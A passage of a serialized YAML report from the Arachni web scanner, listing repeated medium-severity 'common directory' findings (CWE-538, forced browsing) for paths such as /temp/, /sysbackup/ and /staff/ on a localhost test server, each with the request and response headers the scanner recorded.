        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "9"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: old_files
    injected: old_files
    internal_modname: CommonDirectories
    method: ""
    mod_name: CommonDirectories
    name: A common directory exists on the server.
    opts: 
      :regexp: ""
    references: 
      CWE: http://cwe.mitre.org/data/definitions/538.html
      OWASP: https://www.owasp.org/index.php/Forced_browsing
    remedy_guidance: Do not expose file and directory information to the user.
    response: old_files
    severity: Medium
    tags: 
    - path
    - directory
    - common
    - discovery
    url: http://localhost:7470/old_files/
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "538"
  cwe_url: http://cwe.mitre.org/data/definitions/538.html
  description: Tries to find common directories on the server.
  elem: path
  internal_modname: CommonDirectories
  method: ""
  mod_name: CommonDirectories
  name: A common directory exists on the server.
  references: 
    CWE: http://cwe.mitre.org/data/definitions/538.html
    OWASP: https://www.owasp.org/index.php/Forced_browsing
  remedy_guidance: Do not expose file and directory information to the user.
  severity: Medium
  tags: 
  - path
  - directory
  - common
  - discovery
  url: http://localhost:7470/temp/
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "538"
    cwe_url: http://cwe.mitre.org/data/definitions/538.html
    description: Tries to find common directories on the server.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "4"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: temp
    injected: temp
    internal_modname: CommonDirectories
    method: ""
    mod_name: CommonDirectories
    name: A common directory exists on the server.
    opts: 
      :regexp: ""
    references: 
      CWE: http://cwe.mitre.org/data/definitions/538.html
      OWASP: https://www.owasp.org/index.php/Forced_browsing
    remedy_guidance: Do not expose file and directory information to the user.
    response: temp
    severity: Medium
    tags: 
    - path
    - directory
    - common
    - discovery
    url: http://localhost:7470/temp/
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "538"
  cwe_url: http://cwe.mitre.org/data/definitions/538.html
  description: Tries to find common directories on the server.
  elem: path
  internal_modname: CommonDirectories
  method: ""
  mod_name: CommonDirectories
  name: A common directory exists on the server.
  references: 
    CWE: http://cwe.mitre.org/data/definitions/538.html
    OWASP: https://www.owasp.org/index.php/Forced_browsing
  remedy_guidance: Do not expose file and directory information to the user.
  severity: Medium
  tags: 
  - path
  - directory
  - common
  - discovery
  url: http://localhost:7470/sysbackup/
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "538"
    cwe_url: http://cwe.mitre.org/data/definitions/538.html
    description: Tries to find common directories on the server.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "9"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: sysbackup
    injected: sysbackup
    internal_modname: CommonDirectories
    method: ""
    mod_name: CommonDirectories
    name: A common directory exists on the server.
    opts: 
      :regexp: ""
    references: 
      CWE: http://cwe.mitre.org/data/definitions/538.html
      OWASP: https://www.owasp.org/index.php/Forced_browsing
    remedy_guidance: Do not expose file and directory information to the user.
    response: sysbackup
    severity: Medium
    tags: 
    - path
    - directory
    - common
    - discovery
    url: http://localhost:7470/sysbackup/
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "538"
  cwe_url: http://cwe.mitre.org/data/definitions/538.html
  description: Tries to find common directories on the server.
  elem: path
  internal_modname: CommonDirectories
  method: ""
  mod_name: CommonDirectories
  name: A common directory exists on the server.
  references: 
    CWE: http://cwe.mitre.org/data/definitions/538.html
    OWASP: https://www.owasp.org/index.php/Forced_browsing
  remedy_guidance: Do not expose file and directory information to the user.
  severity: Medium
  tags: 
  - path
  - directory
  - common
  - discovery
  url: http://localhost:7470/code/
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "538"
    cwe_url: http://cwe.mitre.org/data/definitions/538.html
    description: Tries to find common directories on the server.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "4"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: code
    injected: code
    internal_modname: CommonDirectories
    method: ""
    mod_name: CommonDirectories
    name: A common directory exists on the server.
    opts: 
      :regexp: ""
    references: 
      CWE: http://cwe.mitre.org/data/definitions/538.html
      OWASP: https://www.owasp.org/index.php/Forced_browsing
    remedy_guidance: Do not expose file and directory information to the user.
    response: code
    severity: Medium
    tags: 
    - path
    - directory
    - common
    - discovery
    url: http://localhost:7470/code/
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "538"
  cwe_url: http://cwe.mitre.org/data/definitions/538.html
  description: Tries to find common directories on the server.
  elem: path
  internal_modname: CommonDirectories
  method: ""
  mod_name: CommonDirectories
  name: A common directory exists on the server.
  references: 
    CWE: http://cwe.mitre.org/data/definitions/538.html
    OWASP: https://www.owasp.org/index.php/Forced_browsing
  remedy_guidance: Do not expose file and directory information to the user.
  severity: Medium
  tags: 
  - path
  - directory
  - common
  - discovery
  url: http://localhost:7470/secure/
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "538"
    cwe_url: http://cwe.mitre.org/data/definitions/538.html
    description: Tries to find common directories on the server.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "6"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: secure
    injected: secure
    internal_modname: CommonDirectories
    method: ""
    mod_name: CommonDirectories
    name: A common directory exists on the server.
    opts: 
      :regexp: ""
    references: 
      CWE: http://cwe.mitre.org/data/definitions/538.html
      OWASP: https://www.owasp.org/index.php/Forced_browsing
    remedy_guidance: Do not expose file and directory information to the user.
    response: secure
    severity: Medium
    tags: 
    - path
    - directory
    - common
    - discovery
    url: http://localhost:7470/secure/
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "538"
  cwe_url: http://cwe.mitre.org/data/definitions/538.html
  description: Tries to find common directories on the server.
  elem: path
  internal_modname: CommonDirectories
  method: ""
  mod_name: CommonDirectories
  name: A common directory exists on the server.
  references: 
    CWE: http://cwe.mitre.org/data/definitions/538.html
    OWASP: https://www.owasp.org/index.php/Forced_browsing
  remedy_guidance: Do not expose file and directory information to the user.
  severity: Medium
  tags: 
  - path
  - directory
  - common
  - discovery
  url: http://localhost:7470/secured/
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "538"
    cwe_url: http://cwe.mitre.org/data/definitions/538.html
    description: Tries to find common directories on the server.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "7"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: secured
    injected: secured
    internal_modname: CommonDirectories
    method: ""
    mod_name: CommonDirectories
    name: A common directory exists on the server.
    opts: 
      :regexp: ""
    references: 
      CWE: http://cwe.mitre.org/data/definitions/538.html
      OWASP: https://www.owasp.org/index.php/Forced_browsing
    remedy_guidance: Do not expose file and directory information to the user.
    response: secured
    severity: Medium
    tags: 
    - path
    - directory
    - common
    - discovery
    url: http://localhost:7470/secured/
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "538"
  cwe_url: http://cwe.mitre.org/data/definitions/538.html
  description: Tries to find common directories on the server.
  elem: path
  internal_modname: CommonDirectories
  method: ""
  mod_name: CommonDirectories
  name: A common directory exists on the server.
  references: 
    CWE: http://cwe.mitre.org/data/definitions/538.html
    OWASP: https://www.owasp.org/index.php/Forced_browsing
  remedy_guidance: Do not expose file and directory information to the user.
  severity: Medium
  tags: 
  - path
  - directory
  - common
  - discovery
  url: http://localhost:7470/staff/
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "538"
    cwe_url: http://cwe.mitre.org/data/definitions/538.html
    description: Tries to find common directories on the server.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "5"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: staff
    injected: staff
    internal_modname: CommonDirectories
    method: ""
    mod_name: CommonDirectories
    name: A common directory exists on the server.
    opts: 
      :regexp: ""
    references: 
      CWE: http://cwe.mitre.org/data/definitions/538.html
      OWASP: https://www.owasp.org/index.php/Forced_browsing
    remedy_guidance: Do not expose file and directory information to the user.
    response: staff
    severity: Medium
    tags: 
    - path
    - directory
    - common
    - discovery
    url: http://localhost:7470/staff/
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "538"
  cwe_url: http://cwe.mitre.org/data/definitions/538.html
  description: Tries to find common directories on the server.
  elem: path
  internal_modname: CommonDirectories
  method: ""
  mod_name: CommonDirectories
  name: A common directory exists on the server.
  references: 
    CWE: http://cwe.mitre.org/data/definitions/538.html
    OWASP: https://www.owasp.org/index.php/Forced_browsing
  remedy_guidance: Do not expose file and directory information to the user.
  severity: Medium
  tags: 
  - path
  - directory
  - common
  - discovery
  url: http://localhost:7470/src/
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "538"
    cwe_url: http://cwe.mitre.org/data/definitions/538.html
    description: Tries to find common directories on the server.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "3"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: src
    injected: src
    internal_modname: CommonDirectories
    method: ""
    mod_name: CommonDirectories
    name: A common directory exists on the server.
    opts: 
      :regexp: ""
    references: 
      CWE: http://cwe.mitre.org/data/definitions/538.html
      OWASP: https://www.owasp.org/index.php/Forced_browsing
    remedy_guidance: Do not expose file and directory information to the user.
    response: src
    severity: Medium
    tags: 
    - path
    - directory
    - common
    - discovery
    url: http://localhost:7470/src/
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "538"
  cwe_url: http://cwe.mitre.org/data/definitions/538.html
  description: Tries to find common directories on the server.
  elem: path
  internal_modname: CommonDirectories
  method: ""
  mod_name: CommonDirectories
  name: A common directory exists on the server.
  references: 
    CWE: http://cwe.mitre.org/data/definitions/538.html
    OWASP: https://www.owasp.org/index.php/Forced_browsing
  remedy_guidance: Do not expose file and directory information to the user.
  severity: Medium
  tags: 
  - path
  - directory
  - common
  - discovery
  url: http://localhost:7470/manage/
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "538"
    cwe_url: http://cwe.mitre.org/data/definitions/538.html
    description: Tries to find common directories on the server.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "6"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: manage
    injected: manage
    internal_modname: CommonDirectories
    method: ""
    mod_name: CommonDirectories
    name: A common directory exists on the server.
    opts: 
      :regexp: ""
    references: 
      CWE: http://cwe.mitre.org/data/definitions/538.html
      OWASP: https://www.owasp.org/index.php/Forced_browsing
    remedy_guidance: Do not expose file and directory information to the user.
    response: manage
    severity: Medium
    tags: 
    - path
    - directory
    - common
    - discovery
    url: http://localhost:7470/manage/
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "538"
  cwe_url: http://cwe.mitre.org/data/definitions/538.html
  description: Tries to find common directories on the server.
  elem: path
  internal_modname: CommonDirectories
  method: ""
  mod_name: CommonDirectories
  name: A common directory exists on the server.
  references: 
    CWE: http://cwe.mitre.org/data/definitions/538.html
    OWASP: https://www.owasp.org/index.php/Forced_browsing
  remedy_guidance: Do not expose file and directory information to the user.
  severity: Medium
  tags: 
  - path
  - directory
  - common
  - discovery
  url: http://localhost:7470/personal/
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "538"
    cwe_url: http://cwe.mitre.org/data/definitions/538.html
    description: Tries to find common directories on the server.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "8"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: personal
    injected: personal
    internal_modname: CommonDirectories
    method: ""
    mod_name: CommonDirectories
    name: A common directory exists on the server.
    opts: 
      :regexp: ""
    references: 
      CWE: http://cwe.mitre.org/data/definitions/538.html
      OWASP: https://www.owasp.org/index.php/Forced_browsing
    remedy_guidance: Do not expose file and directory information to the user.
    response: personal
    severity: Medium
    tags: 
    - path
    - directory
    - common
    - discovery
    url: http://localhost:7470/personal/
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "538"
  cwe_url: http://cwe.mitre.org/data/definitions/538.html
  description: Tries to find common directories on the server.
  elem: path
  internal_modname: CommonDirectories
  method: ""
  mod_name: CommonDirectories
  name: A common directory exists on the server.
  references: 
    CWE: http://cwe.mitre.org/data/definitions/538.html
    OWASP: https://www.owasp.org/index.php/Forced_browsing
  remedy_guidance: Do not expose file and directory information to the user.
  severity: Medium
  tags: 
  - path
  - directory
  - common
  - discovery
  url: http://localhost:7470/publish/
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "538"
    cwe_url: http://cwe.mitre.org/data/definitions/538.html
    description: Tries to find common directories on the server.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "7"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: publish
    injected: publish
    internal_modname: CommonDirectories
    method: ""
    mod_name: CommonDirectories
    name: A common directory exists on the server.
    opts: 
      :regexp: ""
    references: 
      CWE: http://cwe.mitre.org/data/definitions/538.html
      OWASP: https://www.owasp.org/index.php/Forced_browsing
    remedy_guidance: Do not expose file and directory information to the user.
    response: publish
    severity: Medium
    tags: 
    - path
    - directory
    - common
    - discovery
    url: http://localhost:7470/publish/
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "538"
  cwe_url: http://cwe.mitre.org/data/definitions/538.html
  description: Tries to find common directories on the server.
  elem: path
  internal_modname: CommonDirectories
  method: ""
  mod_name: CommonDirectories
  name: A common directory exists on the server.
  references: 
    CWE: http://cwe.mitre.org/data/definitions/538.html
    OWASP: https://www.owasp.org/index.php/Forced_browsing
  remedy_guidance: Do not expose file and directory information to the user.
  severity: Medium
  tags: 
  - path
  - directory
  - common
  - discovery
  url: http://localhost:7470/system/
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "538"
    cwe_url: http://cwe.mitre.org/data/definitions/538.html
    description: Tries to find common directories on the server.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "6"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: system
    injected: system
    internal_modname: CommonDirectories
    method: ""
    mod_name: CommonDirectories
    name: A common directory exists on the server.
    opts: 
      :regexp: ""
    references: 
      CWE: http://cwe.mitre.org/data/definitions/538.html
      OWASP: https://www.owasp.org/index.php/Forced_browsing
    remedy_guidance: Do not expose file and directory information to the user.
    response: system
    severity: Medium
    tags: 
    - path
    - directory
    - common
    - discovery
    url: http://localhost:7470/system/
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "538"
  cwe_url: http://cwe.mitre.org/data/definitions/538.html
  description: Tries to find common directories on the server.
  elem: path
  internal_modname: CommonDirectories
  method: ""
  mod_name: CommonDirectories
  name: A common directory exists on the server.
  references: 
    CWE: http://cwe.mitre.org/data/definitions/538.html
    OWASP: https://www.owasp.org/index.php/Forced_browsing
  remedy_guidance: Do not expose file and directory information to the user.
  severity: Medium
  tags: 
  - path
  - directory
  - common
  - discovery
  url: http://localhost:7470/work/
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "538"
    cwe_url: http://cwe.mitre.org/data/definitions/538.html
    description: Tries to find common directories on the server.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "4"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: work
    injected: work
    internal_modname: CommonDirectories
    method: ""
    mod_name: CommonDirectories
    name: A common directory exists on the server.
    opts: 
      :regexp: ""
    references: 
      CWE: http://cwe.mitre.org/data/definitions/538.html
      OWASP: https://www.owasp.org/index.php/Forced_browsing
    remedy_guidance: Do not expose file and directory information to the user.
    response: work
    severity: Medium
    tags: 
    - path
    - directory
    - common
    - discovery
    url: http://localhost:7470/work/
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "538"
  cwe_url: http://cwe.mitre.org/data/definitions/538.html
  description: Tries to find common directories on the server.
  elem: path
  internal_modname: CommonDirectories
  method: ""
  mod_name: CommonDirectories
  name: A common directory exists on the server.
  references: 
    CWE: http://cwe.mitre.org/data/definitions/538.html
    OWASP: https://www.owasp.org/index.php/Forced_browsing
  remedy_guidance: Do not expose file and directory information to the user.
  severity: Medium
  tags: 
  - path
  - directory
  - common
  - discovery
  url: http://localhost:7470/stuff/
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "538"
    cwe_url: http://cwe.mitre.org/data/definitions/538.html
    description: Tries to find common directories on the server.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "5"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: stuff
    injected: stuff
    internal_modname: CommonDirectories
    method: ""
    mod_name: CommonDirectories
    name: A common directory exists on the server.
    opts: 
      :regexp: ""
    references: 
      CWE: http://cwe.mitre.org/data/definitions/538.html
      OWASP: https://www.owasp.org/index.php/Forced_browsing
    remedy_guidance: Do not expose file and directory information to the user.
    response: stuff
    severity: Medium
    tags: 
    - path
    - directory
    - common
    - discovery
    url: http://localhost:7470/stuff/
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "538"
  cwe_url: http://cwe.mitre.org/data/definitions/538.html
  description: Tries to find common directories on the server.
  elem: path
  internal_modname: CommonDirectories
  method: ""
  mod_name: CommonDirectories
  name: A common directory exists on the server.
  references: 
    CWE: http://cwe.mitre.org/data/definitions/538.html
    OWASP: https://www.owasp.org/index.php/Forced_browsing
  remedy_guidance: Do not expose file and directory information to the user.
  severity: Medium
  tags: 
  - path
  - directory
  - common
  - discovery
  url: http://localhost:7470/tests/
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "538"
    cwe_url: http://cwe.mitre.org/data/definitions/538.html
    description: Tries to find common directories on the server.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "5"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: tests
    injected: tests
    internal_modname: CommonDirectories
    method: ""
    mod_name: CommonDirectories
    name: A common directory exists on the server.
    opts: 
      :regexp: ""
    references: 
      CWE: http://cwe.mitre.org/data/definitions/538.html
      OWASP: https://www.owasp.org/index.php/Forced_browsing
    remedy_guidance: Do not expose file and directory information to the user.
    response: tests
    severity: Medium
    tags: 
    - path
    - directory
    - common
    - discovery
    url: http://localhost:7470/tests/
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "538"
  cwe_url: http://cwe.mitre.org/data/definitions/538.html
  description: Tries to find common directories on the server.
  elem: path
  internal_modname: CommonDirectories
  method: ""
  mod_name: CommonDirectories
  name: A common directory exists on the server.
  references: 
    CWE: http://cwe.mitre.org/data/definitions/538.html
    OWASP: https://www.owasp.org/index.php/Forced_browsing
  remedy_guidance: Do not expose file and directory information to the user.
  severity: Medium
  tags: 
  - path
  - directory
  - common
  - discovery
  url: http://localhost:7470/mail/
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "538"
    cwe_url: http://cwe.mitre.org/data/definitions/538.html
    description: Tries to find common directories on the server.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "4"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: mail
    injected: mail
    internal_modname: CommonDirectories
    method: ""
    mod_name: CommonDirectories
    name: A common directory exists on the server.
    opts: 
      :regexp: ""
    references: 
      CWE: http://cwe.mitre.org/data/definitions/538.html
      OWASP: https://www.owasp.org/index.php/Forced_browsing
    remedy_guidance: Do not expose file and directory information to the user.
    response: mail
    severity: Medium
    tags: 
    - path
    - directory
    - common
    - discovery
    url: http://localhost:7470/mail/
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "538"
  cwe_url: http://cwe.mitre.org/data/definitions/538.html
  description: Tries to find common directories on the server.
  elem: path
  internal_modname: CommonDirectories
  method: ""
  mod_name: CommonDirectories
  name: A common directory exists on the server.
  references: 
    CWE: http://cwe.mitre.org/data/definitions/538.html
    OWASP: https://www.owasp.org/index.php/Forced_browsing
  remedy_guidance: Do not expose file and directory information to the user.
  severity: Medium
  tags: 
  - path
  - directory
  - common
  - discovery
  url: http://localhost:7470/email/
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "538"
    cwe_url: http://cwe.mitre.org/data/definitions/538.html
    description: Tries to find common directories on the server.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "5"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: email
    injected: email
    internal_modname: CommonDirectories
    method: ""
    mod_name: CommonDirectories
    name: A common directory exists on the server.
    opts: 
      :regexp: ""
    references: 
      CWE: http://cwe.mitre.org/data/definitions/538.html
      OWASP: https://www.owasp.org/index.php/Forced_browsing
    remedy_guidance: Do not expose file and directory information to the user.
    response: email
    severity: Medium
    tags: 
    - path
    - directory
    - common
    - discovery
    url: http://localhost:7470/email/
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "538"
  cwe_url: http://cwe.mitre.org/data/definitions/538.html
  description: Tries to find common directories on the server.
  elem: path
  internal_modname: CommonDirectories
  method: ""
  mod_name: CommonDirectories
  name: A common directory exists on the server.
  references: 
    CWE: http://cwe.mitre.org/data/definitions/538.html
    OWASP: https://www.owasp.org/index.php/Forced_browsing
  remedy_guidance: Do not expose file and directory information to the user.
  severity: Medium
  tags: 
  - path
  - directory
  - common
  - discovery
  url: http://localhost:7470/php/
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "538"
    cwe_url: http://cwe.mitre.org/data/definitions/538.html
    description: Tries to find common directories on the server.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "3"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: php
    injected: php
    internal_modname: CommonDirectories
    method: ""
    mod_name: CommonDirectories
    name: A common directory exists on the server.
    opts: 
      :regexp: ""
    references: 
      CWE: http://cwe.mitre.org/data/definitions/538.html
      OWASP: https://www.owasp.org/index.php/Forced_browsing
    remedy_guidance: Do not expose file and directory information to the user.
    response: php
    severity: Medium
    tags: 
    - path
    - directory
    - common
    - discovery
    url: http://localhost:7470/php/
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "538"
  cwe_url: http://cwe.mitre.org/data/definitions/538.html
  description: Tries to find common directories on the server.
  elem: path
  internal_modname: CommonDirectories
  method: ""
  mod_name: CommonDirectories
  name: A common directory exists on the server.
  references: 
    CWE: http://cwe.mitre.org/data/definitions/538.html
    OWASP: https://www.owasp.org/index.php/Forced_browsing
  remedy_guidance: Do not expose file and directory information to the user.
  severity: Medium
  tags: 
  - path
  - directory
  - common
  - discovery
  url: http://localhost:7470/jsp/
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "538"
    cwe_url: http://cwe.mitre.org/data/definitions/538.html
    description: Tries to find common directories on the server.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "3"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: jsp
    injected: jsp
    internal_modname: CommonDirectories
    method: ""
    mod_name: CommonDirectories
    name: A common directory exists on the server.
    opts: 
      :regexp: ""
    references: 
      CWE: http://cwe.mitre.org/data/definitions/538.html
      OWASP: https://www.owasp.org/index.php/Forced_browsing
    remedy_guidance: Do not expose file and directory information to the user.
    response: jsp
    severity: Medium
    tags: 
    - path
    - directory
    - common
    - discovery
    url: http://localhost:7470/jsp/
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "538"
  cwe_url: http://cwe.mitre.org/data/definitions/538.html
  description: Tries to find common directories on the server.
  elem: path
  internal_modname: CommonDirectories
  method: ""
  mod_name: CommonDirectories
  name: A common directory exists on the server.
  references: 
    CWE: http://cwe.mitre.org/data/definitions/538.html
    OWASP: https://www.owasp.org/index.php/Forced_browsing
  remedy_guidance: Do not expose file and directory information to the user.
  severity: Medium
  tags: 
  - path
  - directory
  - common
  - discovery
  url: http://localhost:7470/dev/
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "538"
    cwe_url: http://cwe.mitre.org/data/definitions/538.html
    description: Tries to find common directories on the server.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "3"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: dev
    injected: dev
    internal_modname: CommonDirectories
    method: ""
    mod_name: CommonDirectories
    name: A common directory exists on the server.
    opts: 
      :regexp: ""
    references: 
      CWE: http://cwe.mitre.org/data/definitions/538.html
      OWASP: https://www.owasp.org/index.php/Forced_browsing
    remedy_guidance: Do not expose file and directory information to the user.
    response: dev
    severity: Medium
    tags: 
    - path
    - directory
    - common
    - discovery
    url: http://localhost:7470/dev/
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "538"
  cwe_url: http://cwe.mitre.org/data/definitions/538.html
  description: Tries to find common directories on the server.
  elem: path
  internal_modname: CommonDirectories
  method: ""
  mod_name: CommonDirectories
  name: A common directory exists on the server.
  references: 
    CWE: http://cwe.mitre.org/data/definitions/538.html
    OWASP: https://www.owasp.org/index.php/Forced_browsing
  remedy_guidance: Do not expose file and directory information to the user.
  severity: Medium
  tags: 
  - path
  - directory
  - common
  - discovery
  url: http://localhost:7470/devel/
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "538"
    cwe_url: http://cwe.mitre.org/data/definitions/538.html
    description: Tries to find common directories on the server.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "5"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: devel
    injected: devel
    internal_modname: CommonDirectories
